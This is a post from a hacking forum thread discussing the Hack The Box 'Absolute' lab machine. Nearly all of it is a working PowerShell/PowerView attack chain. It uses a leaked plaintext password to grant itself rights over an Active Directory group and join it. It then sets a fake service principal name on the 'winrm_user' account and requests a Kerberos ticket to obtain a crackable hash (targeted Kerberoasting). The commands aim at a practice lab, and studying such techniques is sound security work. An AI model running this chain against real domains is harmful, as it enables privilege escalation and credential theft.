<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=524340#pid524340" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=524340#pid524340" title="RE: Absolute - HTB [Discussion]">#63</a></strong>
</div>
</div>
<span class="post_date"><span title="September 25, 2022, 10:27 PM">11 hours ago</span> <span class="post_edit" id="edited_by_524340">
<span class="edited_post">(This post was last modified: <span title="September 25, 2022, 11:44 PM">9 hours ago</span> by <a href="https://breached.to/User-jahman">jahman</a>.)</span>
</span></span>
</div>
<div class="post_body scaleimages" id="pid_524340">
					Here is how a obtain the winrm_user hash, not cracked for now<br>
<br>
<div class="codeblock"><div class="body" dir="ltr"><code>$dc_domain="absolute.htb"<br>
<br/>
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force<br/>
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)<br/>
<br/>
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"<br/>
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb<br/>
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred<br/>
<br/>
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force<br/>
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)<br/>
<br/>
Set-DomainObject "CN=winrm_user,CN=Users,DC=absolute,DC=htb"  -Credential $Cred -Domain absolute.htb  -Server dc.absolute.htb  -SET @{"serviceprincipalname"="nonexistent/BLAHBLAH"}<br/>
Get-DomainUser  -Domain absolute.htb  -Server dc.absolute.htb  -Credential $Cred winrm_user  | Select serviceprincipalname<br/>
Get-DomainSPNTicket -Credential $Cred -SPN nonexistent/BLAHBLAH</br></code></div></div>
</br></br></div>
<div class="post_meta" id="post_meta_524340">
<div class="float_right">
</div>
</div>